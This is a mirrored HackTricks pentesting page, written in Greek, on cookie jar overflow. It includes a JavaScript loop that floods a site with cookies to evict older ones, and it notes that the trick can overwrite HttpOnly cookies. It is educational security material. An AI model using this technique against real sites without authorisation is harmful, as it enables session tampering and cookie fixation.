maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md

23 lines
1.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{{#include ../../banners/hacktricks-training.md}}
Οι φυλλομετρητές έχουν ένα **όριο στον αριθμό των cookies** που μπορούν να αποθηκεύσουν για μια σελίδα. Έτσι, αν για κάποιο λόγο χρειαστεί να **κάνετε ένα cookie να εξαφανιστεί**, μπορείτε να **υπερχείλετε το δοχείο cookie** καθώς τα παλαιότερα θα διαγραφούν πρώτα:
```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`
}
```
Σημειώστε ότι τα cookies τρίτων που δείχνουν σε διαφορετικό τομέα δεν θα αντικατασταθούν.
> [!CAUTION]
> Αυτή η επίθεση μπορεί επίσης να χρησιμοποιηθεί για **να αντικαταστήσει τα HttpOnly cookies καθώς μπορείτε να το διαγράψετε και στη συνέχεια να το επαναφέρετε με την τιμή που θέλετε**.
>
> Ελέγξτε το αυτό σε [**αυτή την ανάρτηση με ένα εργαστήριο**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink